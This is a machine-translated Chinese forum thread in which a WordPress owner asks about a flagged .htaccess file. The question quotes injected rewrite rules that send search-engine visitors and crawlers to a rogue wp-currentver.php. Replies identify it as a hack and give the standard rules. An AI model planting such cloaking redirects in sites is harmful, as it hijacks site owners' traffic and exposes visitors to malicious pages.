中推荐的安全措施
Godaddy标记我的/html/。Htaccess文件可能是恶意软件。
这是恶意的吗?此外,它还将wp-currentver.php标记为可能的恶意软件。
我的站点看起来很好,看起来运行良好。
RewriteEngine On
RewriteCond %{ENV:REDIRECT_STATUS} 200
RewriteRule ^ - [L]
RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
RewriteRule ^([^/]*)/$ /wp-currentver.php?p=$1 [L]
# BEGIN WordPress
# END WordPress
你被黑了
这些是重定向,检测是否有人通过谷歌搜索结果与谷歌作为推荐;标准的WordPress(非多站点)重写块位于https://codex.wordpress.org/htaccess,即:
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
文件wp-currentver.php是恶意的,而不是WordPress核心。也可以参见https://productforums.google.com/forum/#!主题/网站/f4Cw1k1-j6g
找一个更安全的主机
然后看看加固WordPress - WordPress Codex和暴力破解攻击- WordPress Codex